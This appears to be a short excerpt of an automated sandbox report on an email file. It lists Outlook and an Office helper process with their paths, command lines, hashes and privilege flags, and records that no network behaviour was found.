        X-Microsoft-Antispam: BCL:0;ARA:13230040|12012899012|2613699012|43540500003;
        X-Microsoft-Antispam-Message-Info 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

        Icon Hash:46070c0a8e0c67d6
        No network behavior found

        Target ID:0
        Start time:22:35:55
        Start date:13/10/2024
        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
        Wow64 process (32bit):true
        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\9ba54f65-7bc2-d549-b688-53131649ef52.eml"
        Imagebase:0x7c0000
        File size:34'446'744 bytes
        MD5 hash:91A5292942864110ED734005B7E005C0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        Target ID:4
        Start time:22:36:03
        Start date:13/10/2024
        Path:C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe
        Wow64 process (32bit):false
        Commandline:"C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D675929E-58F5-446D-A282-324992C7C8DE" "6968D5F9-FDC3-4959-BF37-5B5D02ACDBD9" "7832" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
        Imagebase:0x7ff768880000
        File size:710'048 bytes
        MD5 hash:EC652BEDD90E089D9406AFED89A8A8BD
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Reputation:high
        Has exited:false

        No disassembly